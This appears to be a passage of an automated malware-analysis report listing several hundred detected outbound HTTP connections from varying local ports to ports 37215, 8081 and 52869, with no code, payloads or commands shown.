                      Source: unknownNetwork traffic detected: HTTP traffic on port 51442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33816 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39522 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53364 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41334 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56802 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48746 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42306 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35846 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38296 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47002 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44544 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35626 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54158 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46428 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34140 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56228 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54158 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56364 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54782 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54542 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38446 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58160 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51958 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55246 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37766 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39396 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46556 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57522 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51910 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42676 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49380 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43164 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41858 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44846 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43574 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43878 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56582 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53782 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35856 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46084 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44670 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45300 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34586 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33640 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33132 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54822 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46190 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41892 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56990 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59492 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46300 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49430 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43320 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57274 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52494 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41472 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39246 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55596 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38480 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59306 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59976 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47604 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40396 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36848 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43180 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41910 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34194 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58744 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52160 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39896 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56584 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45864 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39384 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51272 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41276 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54276 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59668 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37880 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41154 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49580 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53414 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36134 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60812 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43704 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60992 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48346 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60696 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34958 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40716 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53346 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54356 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60454 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44232 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43456 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39756 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44460 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46008 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47510 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36542 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57044 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41262 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51844 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38516 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52084 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51022 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52518 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52616 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47918 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36990 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60046 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34800 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55504 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60838 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59528 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46882 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36180 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37552 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38548 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53120 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37830 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52708 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34452 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58576 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46100 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36208 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44754 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47408 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56444 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43332 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43344 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35268 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37482 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38402 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33732 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34146 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53578 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38920 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33088 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38972 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37000 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34406 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39612 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57640 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34334 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58652 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42014 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54370 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39626 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36594 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59762 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47286 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56768 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45592 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41638 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60318 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36408 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49614 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36554 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51814 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59174 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58254 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38836 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56632 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53416 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60362 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45968 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54996 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60396 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35356 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56574 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34670 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48990 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60422 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39088 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39266 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34342 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43378 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41408 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41744 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38320 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58646 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59138 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33958 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34010 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56206 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51258 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37558 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47044 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56298 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36626 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34252 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37778 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53366 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60628 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50716 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37750 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58990 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55798 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36308 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42874 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55464 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33044 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53358 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40100 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35064 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47144 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47738 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57066 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37794 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46444 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44354 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44802 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58726 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55888 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33240 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38068 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44566 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36880 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51202 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59748 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58360 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34060 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54434 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45142 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53128 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53676 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59962 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48432 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42316 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34866 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37610 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49518 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57524 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34032 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56214 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48982 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33598 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53484 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41072 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47142 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54342 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39728 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48742 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45172 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44604 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44792 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43674 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40326 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34276 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43580 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59544 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34924 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35748 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57166 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46490 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60632 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60316 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35356 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44664 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44510 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60232 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51362 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57286 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54240 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48746 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49074 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42362 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45446 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40926 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42884 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42680 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43194 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40506 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43232 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36152 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48504 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46836 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37584 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52630 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45780 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41148 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41162 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49480 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56914 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44972 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45576 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54698 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34740 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48352 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60994 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53972 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51074 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37510 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51636 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42232 -> 52869
